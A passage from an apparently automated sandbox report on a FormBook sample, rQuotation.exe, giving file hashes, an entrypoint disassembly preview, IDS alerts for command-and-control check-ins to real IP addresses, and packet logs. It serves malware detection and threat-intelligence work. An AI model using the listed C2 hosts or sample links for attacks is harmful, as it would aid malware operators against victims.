                                                                                                                                                                                                                                              • 103.106.67.112
                                                                                                                                                                                                                                              GITHUBUShttps://pdf.ac/3eQ2mdGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                                                                                                                                                                              • 140.82.112.3
                                                                                                                                                                                                                                              file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                                                                                              x0EMKX5G1g.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                                                                                                                                                                              • 140.82.113.4
                                                                                                                                                                                                                                              ORDER-24171200967.XLS..jsGet hashmaliciousWSHRat, Caesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                                                                                              3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 140.82.113.4
                                                                                                                                                                                                                                              https://github.com/Matty77o/malware-samples-m-h/blob/main/TheTrueFriend.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 140.82.113.22
                                                                                                                                                                                                                                              PO24002292.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                                                                                              CORREIO BCV.zip.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 140.82.112.22
                                                                                                                                                                                                                                              https://github.com/karakun/OpenWebStart/releases/download/v1.10.1/OpenWebStart_windows-x64_1_10_1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                                                                                              kIMPADTn5g.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                                                              • 140.82.121.4
                                                                                                                                                                                                                                              MULTIBAND-NEWHOPEUSTNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 209.74.64.189
                                                                                                                                                                                                                                              z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 209.74.79.41
                                                                                                                                                                                                                                              ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 209.74.77.107
                                                                                                                                                                                                                                              SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 209.74.64.58
                                                                                                                                                                                                                                              PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 209.74.79.40
                                                                                                                                                                                                                                              ORDER-401.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 209.74.77.107
                                                                                                                                                                                                                                              Rockwool-Msg-S9039587897.pdfGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                                                                                                                                                              • 209.74.95.101
                                                                                                                                                                                                                                              SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 209.74.79.42
                                                                                                                                                                                                                                              Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 209.74.64.187
                                                                                                                                                                                                                                              CJE003889.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 209.74.79.40

                                                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\x5R95Rwl

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):114688
                                                                                                                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Entropy (8bit):7.966566616705462
                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                              File name:rQuotation.exe
                                                                                                                                                                                                                                              File size:289'280 bytes
                                                                                                                                                                                                                                              MD5:d5828dcadc44bcdb74450e5a47118e5e
                                                                                                                                                                                                                                              SHA1:1a83aade8a8eca25a9d4e92323ca22dd9401c531
                                                                                                                                                                                                                                              SHA256:86f08a9f25687299366871821a8b14e11a406a4b83ece1711355505ad4dc1866
                                                                                                                                                                                                                                              SHA512:1735574c2f5d92ab83e65ea04ee4c2966107eed478e90a479d42d5d1b4c98e6cfaa9129050553816cbe3873147466812db98a737397f9067bb75c9b3d2f38ec2
                                                                                                                                                                                                                                              SSDEEP:6144:UgVJ4mtlFOkx2aVFsR3e5BsWN/Qd1Hadel2lbZCGjPv:zJlFO4VqOvwta06X
                                                                                                                                                                                                                                              TLSH:E95423139181AB32FB1151F953AB1136CE9DFF1B5B414B807929099EEDA33371A6C32E
                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=`g.=`g.=`g.....:`g.....<`g.....<`g.Rich=`g.........PE..L....Ny`.................X..........@........p....@................

                                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                                              Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Entrypoint:0x401440
                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                              Time Stamp:0x60794EC4 [Fri Apr 16 08:45:56 2021 UTC]
                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                              Import Hash:

                                                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                                                                              sub esp, 000003A4h
                                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                              push 00000398h
                                                                                                                                                                                                                                              lea eax, dword ptr [ebp-000003A0h]
                                                                                                                                                                                                                                              push 00000000h
                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                              mov dword ptr [ebp-000003A4h], 00000000h
                                                                                                                                                                                                                                              call 00007FB394D0C23Ch
                                                                                                                                                                                                                                              add esp, 0Ch
                                                                                                                                                                                                                                              xor esi, esi
                                                                                                                                                                                                                                              xor ebx, ebx
                                                                                                                                                                                                                                              mov eax, 000000F9h
                                                                                                                                                                                                                                              mov ecx, 00000859h
                                                                                                                                                                                                                                              xor edi, edi
                                                                                                                                                                                                                                              mov dword ptr [ebp-04h], 00004D3Ch
                                                                                                                                                                                                                                              mov edx, 00007766h
                                                                                                                                                                                                                                              mov dword ptr [ebp-08h], 000000D3h
                                                                                                                                                                                                                                              nop
                                                                                                                                                                                                                                              cmp eax, 000000D3h
                                                                                                                                                                                                                                              cmovnle eax, dword ptr [ebp-08h]
                                                                                                                                                                                                                                              dec edx
                                                                                                                                                                                                                                              jne 00007FB394D0A826h
                                                                                                                                                                                                                                              lea esp, dword ptr [esp+00h]
                                                                                                                                                                                                                                              mov eax, 92492493h
                                                                                                                                                                                                                                              imul ecx
                                                                                                                                                                                                                                              add edx, ecx
                                                                                                                                                                                                                                              sar edx, 04h
                                                                                                                                                                                                                                              mov ecx, edx
                                                                                                                                                                                                                                              shr ecx, 1Fh
                                                                                                                                                                                                                                              add ecx, edx
                                                                                                                                                                                                                                              jne 00007FB394D0A81Dh
                                                                                                                                                                                                                                              call 00007FB394D0C4DBh
                                                                                                                                                                                                                                              mov dword ptr [ebp-48h], eax
                                                                                                                                                                                                                                              lea eax, dword ptr [ebp-00000140h]
                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                              push 00003CCCh
                                                                                                                                                                                                                                              call 00007FB394D0A517h
                                                                                                                                                                                                                                              add esp, 08h
                                                                                                                                                                                                                                              mov ecx, 00000058h
                                                                                                                                                                                                                                              mov eax, AC769185h
                                                                                                                                                                                                                                              imul ecx
                                                                                                                                                                                                                                              add edx, ecx
                                                                                                                                                                                                                                              sar edx, 06h
                                                                                                                                                                                                                                              mov ecx, edx
                                                                                                                                                                                                                                              shr ecx, 1Fh
                                                                                                                                                                                                                                              add ecx, edx
                                                                                                                                                                                                                                              jne 00007FB394D0A81Dh
                                                                                                                                                                                                                                              lea eax, dword ptr [ebp-70h]
                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                              push 00005676h
                                                                                                                                                                                                                                              call 00007FB394D0A4ECh
                                                                                                                                                                                                                                              lea eax, dword ptr [ebp-70h]
                                                                                                                                                                                                                                              push 0C397C98h
                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                              call 00007FB394D0AE3Eh

                                                                                                                                                                                                                                              Rich Headers

                                                                                                                                                                                                                                              Programming Language:
                                                                                                                                                                                                                                              • [C++] VS2012 build 50727
                                                                                                                                                                                                                                              • [ASM] VS2012 build 50727
                                                                                                                                                                                                                                              • [LNK] VS2012 build 50727

                                                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                              Sections

                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                              .text0x10000x457640x45800924d855fb38c00ac133d311bcbae1d0cFalse0.9901676315197842data7.9961506950995505IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                              2024-12-23T04:08:06.153570+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44973652.223.13.4180TCP
                                                                                                                                                                                                                                              2024-12-23T04:08:23.474747+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449754192.30.252.15480TCP
                                                                                                                                                                                                                                              2024-12-23T04:08:26.138223+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449760192.30.252.15480TCP
                                                                                                                                                                                                                                              2024-12-23T04:08:28.793205+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449766192.30.252.15480TCP
                                                                                                                                                                                                                                              2024-12-23T04:08:31.455127+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449772192.30.252.15480TCP
                                                                                                                                                                                                                                              2024-12-23T04:08:38.333889+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449788209.74.79.4080TCP
                                                                                                                                                                                                                                              2024-12-23T04:08:41.037762+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449797209.74.79.4080TCP
                                                                                                                                                                                                                                              2024-12-23T04:08:43.781516+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449805209.74.79.4080TCP
                                                                                                                                                                                                                                              2024-12-23T04:08:46.361069+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449811209.74.79.4080TCP
                                                                                                                                                                                                                                              2024-12-23T04:08:53.588934+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449827202.95.11.11080TCP
                                                                                                                                                                                                                                              2024-12-23T04:08:56.260635+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449836202.95.11.11080TCP
                                                                                                                                                                                                                                              2024-12-23T04:08:58.932562+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449842202.95.11.11080TCP
                                                                                                                                                                                                                                              2024-12-23T04:09:01.789855+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449850202.95.11.11080TCP
                                                                                                                                                                                                                                              2024-12-23T04:09:17.847715+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449889199.59.243.22780TCP
                                                                                                                                                                                                                                              2024-12-23T04:09:20.511273+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449897199.59.243.22780TCP
                                                                                                                                                                                                                                              2024-12-23T04:09:23.180910+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449903199.59.243.22780TCP
                                                                                                                                                                                                                                              2024-12-23T04:09:25.825097+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449909199.59.243.22780TCP
                                                                                                                                                                                                                                              2024-12-23T04:09:33.057642+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449928192.186.58.3180TCP
                                                                                                                                                                                                                                              2024-12-23T04:09:35.713860+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449935192.186.58.3180TCP
                                                                                                                                                                                                                                              2024-12-23T04:09:38.370315+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449942192.186.58.3180TCP
                                                                                                                                                                                                                                              2024-12-23T04:09:41.161466+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449948192.186.58.3180TCP
                                                                                                                                                                                                                                              2024-12-23T04:09:49.229653+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449969103.106.67.11280TCP
                                                                                                                                                                                                                                              2024-12-23T04:09:51.885890+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449974103.106.67.11280TCP
                                                                                                                                                                                                                                              2024-12-23T04:09:54.542108+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449980103.106.67.11280TCP
                                                                                                                                                                                                                                              2024-12-23T04:09:57.792650+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449988103.106.67.11280TCP
                                                                                                                                                                                                                                              2024-12-23T04:10:05.153667+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450007185.68.108.24380TCP
                                                                                                                                                                                                                                              2024-12-23T04:10:07.867470+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450016185.68.108.24380TCP
                                                                                                                                                                                                                                              2024-12-23T04:10:10.523001+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450024185.68.108.24380TCP
                                                                                                                                                                                                                                              2024-12-23T04:10:13.179553+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450030185.68.108.24380TCP
                                                                                                                                                                                                                                              2024-12-23T04:10:20.552836+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003152.223.13.4180TCP
                                                                                                                                                                                                                                              2024-12-23T04:10:23.216474+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003252.223.13.4180TCP
                                                                                                                                                                                                                                              2024-12-23T04:10:25.875769+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003352.223.13.4180TCP
                                                                                                                                                                                                                                              2024-12-23T04:10:28.813593+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45003452.223.13.4180TCP

                                                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:04.931631088 CET4973680192.168.2.452.223.13.41
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:05.051207066 CET804973652.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:05.051294088 CET4973680192.168.2.452.223.13.41
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:05.062185049 CET4973680192.168.2.452.223.13.41
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:05.181659937 CET804973652.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:06.153362036 CET804973652.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:06.153422117 CET804973652.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:06.153569937 CET4973680192.168.2.452.223.13.41
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:06.158288956 CET4973680192.168.2.452.223.13.41
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:06.277813911 CET804973652.223.13.41192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:22.257370949 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:22.376920938 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:22.377012968 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:22.389950037 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:22.509567976 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.474469900 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.474647045 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.474664927 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.474680901 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.474697113 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.474714994 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.474731922 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.474746943 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.474831104 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.474841118 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.474857092 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.474872112 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.474909067 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.474941969 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.594496012 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.594609022 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.594671965 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.666698933 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.666802883 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.666877985 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.670840025 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.670954943 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.671015978 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.679253101 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.679367065 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.679476023 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.687231064 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.687284946 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.687355042 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.695600033 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.695759058 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.695820093 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.703974962 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.704091072 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.705127954 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.712368011 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.712470055 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.712527990 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.720748901 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.720830917 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.720887899 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.729068041 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.729186058 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.729240894 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.737488985 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.737642050 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.737701893 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.745842934 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.745924950 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.746022940 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.858699083 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.858794928 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.858855963 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.861188889 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.861332893 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.861411095 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.866223097 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.866338015 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.866406918 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.871231079 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.871366978 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.871436119 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.876241922 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.876343012 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.876432896 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.881083012 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.881383896 CET8049754192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.881448030 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:23.901376963 CET4975480192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:24.919543982 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:25.039271116 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:25.039370060 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:25.051013947 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:25.170574903 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138079882 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138154984 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138209105 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138222933 CET4976080192.168.2.4192.30.252.154
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138242960 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138298988 CET8049760192.30.252.154192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 04:08:26.138299942 CET4976080192.168.2.4192.30.252.154
